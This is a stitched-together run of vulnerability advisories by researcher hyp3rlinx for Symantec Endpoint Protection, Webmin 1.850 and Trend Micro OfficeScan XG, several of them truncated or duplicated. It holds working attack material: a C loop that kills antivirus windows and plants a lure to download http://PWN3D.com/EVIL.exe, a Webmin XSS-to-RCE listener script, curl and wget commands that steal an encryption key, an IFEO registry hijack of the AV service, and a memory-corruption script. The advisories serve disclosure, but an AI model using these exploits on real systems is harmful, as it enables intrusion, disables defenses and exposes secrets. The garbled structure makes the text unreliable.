//How: FindWindow / SendMessage Win32 API 
//Impact: DOS / Integrity Compromised
//TO-DO: Get Window text for SavUI.exe and DOS to prevent AV scans.

void main(void){
 
   while(1){

   HWND hWnd = FindWindow( NULL, TEXT("Status - Symantec Endpoint Protection"));
   
   if(hWnd!=NULL){
 //This injects arbitrary messages to SEP UI.
 SetWindowText(hWnd, "*** Important Security Update, Visit: 
http://PWN3D.com/EVIL.exe download and follow instructions. ***");
 //This prevents a user from being able to run AV scans and renders SEP UI 
useless
//SendMessage(hWnd, WM_SYSCOMMAND, SC_CLOSE, 0);   
   }  
   
   //HWND savUI = FindWindowEx(0, 0, "Symantec Endpoint Protection", 0);
   
   HWND x = FindWindow(NULL, TEXT("DevViewer"));
   if(x!=NULL){
 SendMessage(x, WM_SYSCOMMAND, SC_CLOSE, 0);   
  }
  
   HWND x2 = FindWindow(NULL, TEXT("DoScan Help"));
   SendMessage(x2, WM_SYSCOMMAND, SC_CLOSE, 0); 

   HWND x3 = FindWindow(NULL, TEXT("Sylink Drop"));
   SendMessage(x3, WM_SYSCOMMAND, SC_CLOSE, 0);  
   
  HWND x4 = FindWindow(NULL, TEXT("Manual Scan started on 7/8/2016"));
   if(x!=NULL){
 SendMessage(x4, WM_SYSCOMMAND, SC_CLOSE, 0);   
  }
  
   sleep(1);
   
   }  
}


Network Access:
===
Local




Severity:
=
Medium



Disclosure Timeline:
=
Vendor Notification: July 8, 2016
Vendor acknowledged: 7/14/16
Vendor advisory : November 6, 2017
November 10, 2017  : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Webmin v1.850 Remote Code Execution (hyp3rlinx / apparitionsec)

[apparitionsec]

[+] SSD Beyond Security: https://blogs.securiteam.com/index.php/archives/3430
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/WEBMIN-v1.850-REMOTE-COMMAND-EXECUTION.txt
[+] ISR: ApparitionSec
 


Vulnerability summary
The following advisory describes three (3) vulnerabilities found in Webmin 
version 1.850

Webmin “is a web-based interface for system administration for Unix. Using any 
modern web browser, you can setup user accounts, Apache, DNS,
file sharing and much more. Webmin removes the need to manually edit Unix 
configuration files like /etc/passwd, and lets you manage a system from
the console or remotely. See the standard modules page for a list of all the 
functions built into Webmin.”

The vulnerabilities found are:

XSS vulnerability that leads to Remote Code Execution
CSRF Schedule arbitrary commands
Server Side Request Forgery

Credit
An independent security researcher, hyp3rlinx, has reported this vulnerability 
to Beyond Security’s SecuriTeam Secure Disclosure program

Vendor response
The vendor has released patches to address these vulnerabilities.

For more information: 
https://github.com/webmin/webmin/commit/0c58892732ee7610a7abba5507614366d382c9c9
 and http://www.webmin.com/security.html


Vulnerability details
XSS vulnerability that leads to Remote Code Execution

Under Webmin menu ‘Others/File Manager‘ there is option to download a file from 
a remote server ‘Download from remote URL‘.

By setting up a malicious server we can wait for file download request then 
send a XSS payload that will lead to Remote Code Execution.

Webmin echo back the ‘File Download‘ request status which we can trigger the 
XSS vulnerability and bypass this Referrer check by setting the
domain=webmin-victim-ip.

Proof of Concept


import socket

#===
#Run this script and listen for file download from webmin
#Enter payload to execute RCE
#wait for webmin to connect and download file
#Vulnerability is in Menu/Others/File Manager
#issue is webmin echoes back status of the download
#by injecting XSS we bypass the Referer: check by assign
#domain to victims own IP, then execute our RCE
#---
#e.g.
#Download from remote URL
#http://x.x.x.x:1/shell/index.cgi
#> whoami
#root

PORT=int(raw_input("[PORT]> ")) #port we listen on for file download requests
WEBMIN_IP=raw_input("[Webmin IP]> ") #victim

#Read /etc/shadow file
CMD=("/>document.domain='<a  rel="nofollow" href="http://"+WEBMIN_IP+":1/shell/index.cgi">http://"+WEBMIN_IP+":1/shell/index.cgi</a>'"+
""+
"document.forms[0].submit()")

s = socket.socket()
HOST = '' 
s.bind((HOST, PORT)) 
s.listen(5) 

print '\nwebmin file download 0day...'

while True:
 conn, addr = s.accept() 
 conn.send(CMD+'\r\n')
 print 'Connected!'
 print s.recv(1024)
 conn.close()
s.close()




CSRF Schedule arbitrary commands

User controlled input is not sufficiently sanitized, by sending GET request to 
create_job.cgi with the following parameter dir=/=ls
an attacker to execute arbitrary commands.

Proof of Concept

http://x.x.x.x:1/at/create_job.cgi?user=root=31=7=2017=2=00=/=ls
 -lt=0
Server Side Request Forgery

User controlled input is not sufficiently sanitized, by sending GET request to 
tunnel/link.cgi/http://VICTIM-IP:8000 an attacker can trigger
the vulnerability

Proof of Concept


http://x.x.x.x:1/tunnel/link.cgi/http://VICTIM-IP:8000


Network Access:
===
Remote



Severity:
=
High



Disclosure Timeline:

Would like to acknowledge Beyond Security’s SSD program for the help with 
co-ordination of this vulnerability.
More details can be found on their blog at:

https://blogs.securiteam.com/index.php/archives/3430




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized NT Domain / PHP Information Disclosures CVE-2017-14085 (apparitionsec / hyp3rlinx)

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14085-TRENDMICRO-OFFICESCAN-XG-REMOTE-NT-DOMAIN-PHP-INFO-DISCLOSURE.txt
[+] ISR: ApparitionSec
 


Vendor:
==
www.trendmicro.com



Product:
===
OfficeScan
v11.0 and XG (12.0)*


Vulnerability Type:
===
Unauthorized NT Domain Disclosure
Unauthorized PHP Information Disclosure

OfficeScan protects enterprise networks from malware, network viruses, 
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program 
that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its 
security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security 
policies and deploy updates to every agent.



CVE Reference:
==
CVE-2017-14085



Security Issue(s):

( NT Domain Disclosure )
Remote unauthenticated attackers who reach the TrendMicro OfficeScan XG 
application can query the networks NT domains.
NT enumeration is leaked by the web interface when it should not do so. 
Usually, you use NET commands so while this NT enumeration
is not high in severity, it should not return this information and especially 
to unauthorized users as it can aid in launching
further attacks.


( PHP Information Disclosure )
Remote unauthenticated attackers that can connect to TrendMicro OfficeScan XG 
application can query the PHP version and modules.

In 'analyzeWF.php" we see get_loaded_extensions() and phpversion() calls, but 
session or authentication check is made.

$strAnalyzeResultHeader .= analyzeWFShowItemInfo('Current PHP version: 
'.phpversion());
$strAnalyzeResultHeader .= analyzeWFShowItemInfo('PHP extensions: '.implode(', 
',get_loaded_extensions()));
$strAnalyzeResultHeader .= analyzeWFShowItemInfo('WGF version : '.$strVersion);

etc...


References:
===
https://success.trendmicro.com/solution/1118372



Exploit/POC (NT Domain Disclosure):
=
[root@localhost /]# curl -v -k  
https://VICTIM-IP:4343/officescan/console/RemoteInstallCGI/cgiGetNTDomain.exe
* About to connect() to VICTIM-IP port 4343
*   Trying VICTIM-IP... connected


< HTTP/1.1 200 OK
< Pragma: no-cache
< Content-Type: text/plain;charset=utf-8
< Server: Microsoft-IIS/7.5
< X-Powered-By: ASP.NET
< Date: Thu, 01 Jun 2017 15:27:27 GMT
< Connection: close
< Content-Length: 510
{
   "ERROR" : {
  "ERROR_CODE" : 0
   },
   "RESPONSE" : {
  "NODES" : [
 {
"NAME" : "Avaya"
 },
 {
"NAME" : "Km-netprinters"
 },
 {
"NAME" : "Mshome"
 },
 {
"NAME" : "Printserver"
 },
 {
"NAME" : "MyDomain"
 },
 {
"NAME" : "Workgroup"
 },
 {
"NAME" : "Xpemb"
 }
  ]
   }
}


Exploit / POC (PHP Information Disclosure):

c:\> curl -k 
https://VICTIM-IP:4343/officescan/console/html/widget/repository/widgetPool/wp1/interface/analyzeWF.php

HTTP/1.1 200 OK

[INI_UPDATE_SECTION]

>>>> Start Anaylze WGF : 2017-06-02 15:58:26
[INFO] Current PHP version: 7.0.6
[INFO] PHP extensions: Core, bcmath, calendar, ctype, date, filter, hash, 
iconv, json, mcrypt, SPL, pcre, Reflection, session, standard, mysqlnd, 
tokenizer, zip, zlib, libxml, dom, PDO, openssl, SimpleXML, xml, wddx, 
xmlreader, xmlwriter, cgi-fcgi, curl, gmp, ldap, mbstring, Phar, pdo_sqlite, 
soap, com_dotnet
[INFO] WGF version : 3.8
[INFO] WGF current wp in /path/to/widgetPool/config.php : wp2
[INFO] WGF is /path/to/widgets_new exists : true
[ERROR] C:\Windows\TEMP check read/write permissions : failed
To solved this problem please reference document here.

etc...



Network Access:
===
Remote




Severity:
=
Medium



Disclosure Timeline:
=
Vendor Notification:  June 2, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017  : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information con

Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Server Side Request Forgery (apparitionsec / hyp3rlinx)

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-SERVER-SIDE-REQUEST-FORGERY.txt
[+] ISR: ApparitionSec
 


Vendor:
==
www.trendmicro.com



Product:
===
OfficeScan 
v11.0 and XG (12.0)*


OfficeScan protects enterprise networks from malware, network viruses, 
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program 
that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its 
security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security 
policies and deploy updates to every agent.



Vulnerability Type:
===
Unautherized Server Side Request Forgery



CVE Reference:
==
N/A



Security Issue:

Unauthorized LAN attackers that can reach the OfficeScan XG application can 
make arbitrary HTTP requests to external and internal servers.
Abusing a Server Side Request Forgery flaw in the "help_Proxy.php" 
functionality.




Exploit/POC:
=
https://VICTIM-IP:4343/officescan/console/html/Widget/help_proxy.php?url=http://:8080

python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...

 - - [31/May/2017 12:21:41] "GET / HTTP/1.1" 200 -

help_proxy.php HTTP response:
{"request_url":"http:\/\/:8080","http_code":200,"flag":1}


Network Access:
===
Remote



Severity:
=
Medium



Disclosure Timeline:
=
Vendor Notification:  May 31, 2017
Vendor reply: "We confirmed that this is a valid vulnerability. We are now 
working on a hotfix to remediate the issue." : June 30, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Trend Micro OfficeScan v11.0 and XG (12.0)* CURL (MITM) Remote Code Execution CVE-2017-14084 (apparitionsec / hyp3rlinx)

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14084-TRENDMICRO-OFFICESCAN-XG-CURL-MITM-REMOTE-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
 


Vendor:
==
www.trendmicro.com



Product:

OfficeScan
v11.0 and XG (12.0)*


OfficeScan protects enterprise networks from malware, network viruses, 
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program 
that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its 
security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security 
policies and deploy updates to every agent.



Vulnerability Type:
===
Man-in-the-Middle (MITM) Remote Code Execution



CVE Reference:
==
CVE-2017-14084



Security Issue:
===
MITM vector exists as the CURL request used by Send() function in 
"HttpTalk.php" has both CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST set 
to false.
CURLOPT_SSL_VERIFYPEER checks if remote certificate is valid and that you trust 
was issued by a CA you trust and it's genuine.
CURLOPT_SSL_VERIFYHOST checks that the cert was issued to the entity you want 
to talk to...


References:
===
https://success.trendmicro.com/solution/1118372


Vulnerable code snippet...

curl_setopt($this->_objcurlHandle, CURLOPT_FOLLOWLOCATION,false);
curl_setopt($this->_objcurlHandle, CURLOPT_RETURNTRANSFER,true);
curl_setopt($this->_objcurlHandle, CURLOPT_HEADER, true);
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYHOST, 0);  
<===  HERE
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYPEER, 0);  
< THERE



Network Access:
===
Remote



Severity:
=
High



Disclosure Timeline:
=
Vendor Notification: May 31, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Start Remote Process Code Execution / DOS - INI Corruption CVE-2017-14086 (apparitionsec / hyp3rlinx)

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14086-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-START-REMOTE-PROCESS-CODE-EXECUTION-MEM-CORRUPT.txt
[+] ISR: ApparitionSec
 


Vendor:
==
www.trendmicro.com



Product:

OfficeScan XG
v11.0 and (12.0)*



Vulnerability Type:
===
Unauthorized Start Remote Process Code Execution
Unauthorized Denial Of Service - INI Corruption

OfficeScan protects enterprise networks from malware, network viruses, 
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program 
that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its 
security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security 
policies and deploy updates to every agent.



CVE Reference:
==
CVE-2017-14086



Security Issue:

Remote unauthenticated attackers who connect to the OfficeScan XG application 
can temporarily start the "fcgiOfcDDA.exe" executable
this process will run for short time before dies, server disk space may also be 
consumed with dump files by making continous HTTP requests.


References:
===
https://success.trendmicro.com/solution/1118372



Exploit/POC Start Remote Process Code Execution:

c:\> curl -k  https://VICTIM-IP:4343/officescan/console/CGI/ 

HTTP response:
403 - Forbidden: Access is denied.
You do not have permission to view this directory or page using the credentials 
that you supplied

But, we can access it directly :)

c:\> curl -v -k  https://VICTIM-IP:4343/officescan/console/CGI/fcgiOfcDDA.exe

HTTP Response:

500 - Internal server error.
There is a problem with the resource you are looking for, and it cannot be 
displayed.

The EXE is called then runs for short time before .DMP is generated.

fcgiOfcDDA.exe.6808.dmp

The stored exception information can be accessed via .ecxr.
(568.112c): Unknown exception - code c00d (first/second chance not 
available)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for 
kernel32.dll - 
eax= ebx=0014f780 ecx= edx= esi=0002 edi=
eip=77d9016d esp=0014f730 ebp=0014f7cc iopl=0 nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=0246
ntdll!NtWaitForMultipleObjects+0x15:



Exploit/POC (Denial Of Service / INI Corruption):
==
[root@localhost /]# curl -v -k  
https://VICTIM-IP:4343/officescan/CGI/cgiRqUpd.exe
* About to connect() to VICTIM-IP port 4343
*   Trying VICTIM-IP.. connected

Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Remote Encryption Key Disclosure CVE-2017-14083 (apparitionsec / hyp3rlinx)

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14083-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-ENCRYPTION-KEY-DISCLOSURE.txt
[+] ISR: ApparitionSec
 


Vendor:
==
www.trendmicro.com



Product:

OfficeScan 
v11.0 and XG (12.0)*


OfficeScan protects enterprise networks from malware, network viruses, 
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program 
that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its 
security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security 
policies and deploy updates to every agent.



Vulnerability Type:
===
Unauthorized Encryption Key Disclosure



CVE Reference:
==
CVE-2017-14083



Security Issue:

Remote unauthenticated attackers who can reach the TrendMicro OfficeScan XG 
application which usually runs on port 4343 can download
the OfficeScan XG encryption "crypt.key" file. This crypt.key is used for the 
OfficeScan XG encryption process.


References:
===
https://success.trendmicro.com/solution/1118372


e.g.

In "config.php" 

/* *
 * Encryption module configurations
 */
$wfconf_wfcrypt_keyfile = dirname(__FILE__) . 
"/../repository/inc/class/common/crypt/crypt.key";<= 
HERE 
$wfconf_wfcrypt_algorithm = MCRYPT_RIJNDAEL_256; // MCRYPT_3DES MCRYPT_BLOWFISH 
MCRYPT_CAST_256 MCRYPT_DES ...
/* *
 * Framework configurations
 */



Exploit/POC:
=

[root@localhost /]# wget --no-check-certificate  
https://VICTIM-IP:4343/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key
--14:59:52--  
https://VICTIM-IP:4343/officescan/console/html/widget/repository/inc/class/common/crypt/crypt.key
Connecting to VICTIM-IP:4343... connected.
WARNING: cannot verify VICTIM-IP's certificate, issued by `/CN=VICTIM-IP':
  Self-signed certificate encountered.
HTTP request sent, awaiting response... 200 OK
Length: 32 [application/octet-stream]
Saving to: `crypt.key'

100%[==>]
 32  --.-K/s   in 0s 

14:59:52 (15.3 MB/s) - `crypt.key' saved [32/32]



Network Access:
===
Remote




Severity:
=
High



Disclosure Timeline:
=
Vendor Notification: May 31, 2017
Vendor: "hotfix in progress". June 23, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017  : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Change Prevention Image File Execution Bypass (apparitionsec / hyp3rlinx)

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-IMAGE-FILE-EXECUTION-BYPASS.txt
[+] ISR: ApparitionSec
 


Vendor:
==
www.trendmicro.com



Product:

OfficeScan 
v11.0 and XG (12.0)*


OfficeScan protects enterprise networks from malware, network viruses, 
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program 
that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its 
security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security 
policies and deploy updates to every agent.


Vulnerability Type:
===
Image File Execution Bypass



CVE Reference:
==
N/A



Security Issue:

OfficeScan XG "Unauthorized Change Prevention Service" is a Local SYSTEM 
service that is supposed to protect OfficeScan processes
like "PccNTMon.exe" from being terminated, and also prevents unauthorized 
arbitrary registry settings being made to the protected
machine even by an Administrator.

However, we can easily bypass by exploiting Windows Image File Execution 
Options (IFEO) to hijack the service process.
IFEO has been used by malwares for some time to prevent process from running or 
execute a process of an attackers choosing in
place of the process the user expects.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File 
Execution Options

All an attacker needs to do is create a registry key in IFEO with the same name 
as "TMBMSRV.exe" which is used by the
"Trend Micro Unauthorized Change Prevention Service" SYSTEM service. After 
creating this registry key we create a "string value"
named debugger pointing to say "calc.exe", we wait and once system reboots BOOM!


References:
===
https://success.trendmicro.com/solution/1118372



Exploit/POC:
=

Reproduction:

1) Open registry 

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File 
Execution Options

2) Create a new Key with no name

3) Create a new string value under the new key named "debugger" with value of 
c:\Windows\system32\calc.exe

4) Rename the created key to TMBMSRV.exe 

5) Reboot system

Done!

We can then not only Kill TM but write to TrendMicro whitelist key in the 
registry for our evil binary to be left alone in peace.



Network Access:
===
Local



Severity:
=
High



Disclosure Timeline:
=
Vendor Notification: June 28, 2017
Vendor Reply: "Officescan Build 1222 which is affected by this bug was already 
pulled and is no longer available for public download"
Vendor Reply: "created hotfixes for product improvement."
September 28, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized Remote Memory Corruption CVE-2017-14089 (apparitionsec / hyp3rlinx)

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14089-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-MEMORY-CORRUPTION.txt
[+] ISR: ApparitionSec   
 


Vendor:
==
www.trendmicro.com



Product:

OfficeScan 
v11.0 and XG (12.0)*


OfficeScan protects enterprise networks from malware, network viruses, 
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program 
that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its 
security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security 
policies and deploy updates to every agent.


Vulnerability Type:
===
Unauthorized Remote Memory Corruption



CVE Reference:
==
CVE-2017-14089



Security Issue:

Remote unauthenticated attackers that can make connection the TrendMicro 
OfficeScan XG application targeting the "cgiShowClientAdm.exe"
process can cause memory corruption issues.


References:
===
https://success.trendmicro.com/solution/1118372



Exploit/POC:
=
import urllib,urllib2
from urllib2 import Request

print 'TrendMicro OfficeScan XG'
print 'Stack Memory Corruption POC'
print 'by hyp3rlinx\n'

IP="VICTIM-IP:4343"

PAYLOAD="A"*256

url = 
urllib2.Request('https://'+IP+'/officescan/console/html/cgi/cgiShowClientAdm.exe')
cookie="Cookie: serror=0; session_expired=no; 
FeatureEnableState=enableAntiBody@1|enableCCFR@1|enableCfw@1|enableDcs@1|enableSorting@0|enableSpy@1|enableVirus@1|HasAvAddSvc@1|installWSS@1|enableDLP@0|sqldbMode@0|enableIPv6@1|w2ksupport@0|;
 stamp=2231521137; timestamp=1497360567; DisabledIds=.; 
LogonUser=A;
 ReadOnlyIds=8.56.; enableRba=1; key=16914202097564; session=666; LANG=en_US; 
PHPSESSID=WHATEVER123; lastID=34; lastTab=-1; theme=default; 
wf_CSRF_token=; serror=0; retry=0; 
PHPSESSID=WHATEVERHERE; wf_CSRF_token=666; LANG=en_US; theme=default; 
lastID=33; lastTab=-1"

print '\nsending packetz... \n'+ cookie

##url.add_header("X-CSRFToken", "ee721b62aef83b017e8c86f52e38a411")
#<== X-CSRFToken IS NOT EVEN NEEDED!
url.add_header("Content-Type", "application/x-www-form-urlencoded; 
charset=utf-8")
url.add_header("Content-Length", "54")
url.add_header("Cookie ",cookie)

req=urllib2.urlopen(url)
res = urllib2.urlopen(req)
print res




Network Access:
===
Remote




Severity:
=
High



Disclosure Timeline:

Vendor Notification:  June 5, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

CVE-2017-14087 Trend Micro OfficeScan v11.0 and XG (12.0)* Host Header Injection (apparitionsec / hyp3rlinx)

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14087-TRENDMICRO-OFFICESCAN-XG-HOST-HEADER-INJECTION.txt
[+] ISR: ApparitionSec
 


Vendor:
==
www.trendmicro.com



Product:

OfficeScan 
v11.0 and XG (12.0)*


OfficeScan protects enterprise networks from malware, network viruses, 
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program 
that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its 
security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security 
policies and deploy updates to every agent.



Vulnerability Type:
===
Host Header Injection



CVE Reference:
==
CVE-2017-14087



Security Issue:

Host header injection issue as "db_controller.php" relies on 
$_SERVER['HTTP_HOST'] which can be spoofed by client, instead of 
$_SERVER['SERVER_NAME'].
In environments where caching is in place by making HTTP GET request with a 
poisoned HOST header webpages can potentially render arbitrary
links that point to a malicious website.


Exploit/POC:
=

c:\> CURL http://x.x.x.x -H "Host: ATTACKER-IP"



Network Access:
===
Remote




Severity:
=
Medium



Disclosure Timeline:
==
Vendor Notification:  June 2, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no 
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in 
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the 
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author 
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

CVE-2017-14084 Trend Micro OfficeScan v11.0 and XG (12.0)* CURL (MITM) Remote Code Execution (apparitionsec / hyp3rlinx)

[apparitionsec]

[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14084-TRENDMICRO-OFFICESCAN-XG-CURL-MITM-REMOTE-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
 


Vendor:
==
www.trendmicro.com



Product:

OfficeScan
v11.0 and XG (12.0)*


OfficeScan protects enterprise networks from malware, network viruses, 
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent program 
that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and reports its 
security status to the server. The server, through the
web-based management console, makes it easy to set coordinated security 
policies and deploy updates to every agent.



Vulnerability Type:
===
Man-in-the-Middle (MITM) Remote Code Execution



CVE Reference:
==
CVE-2017-14084



Security Issue:
===
MITM vector exists as the CURL request used by Send() function in 
"HttpTalk.php" has both CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST set 
to false.
CURLOPT_SSL_VERIFYPEER checks if remote certificate is valid and that you trust 
was issued by a CA you trust and it's genuine.
CURLOPT_SSL_VERIFYHOST checks that the cert was issued to the entity you want 
to talk to...


References:
===
https://success.trendmicro.com/solution/1118372


Vulnerable code snippet...

curl_setopt($this->_objcurlHandle, CURLOPT_FOLLOWLOCATION,false);
curl_setopt($this->_objcurlHandle, CURLOPT_RETURNTRANSFER,true);
curl_setopt($this->_objcurlHandle, CURLOPT_HEADER, true);
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYHOST, 0);  
<===  HERE
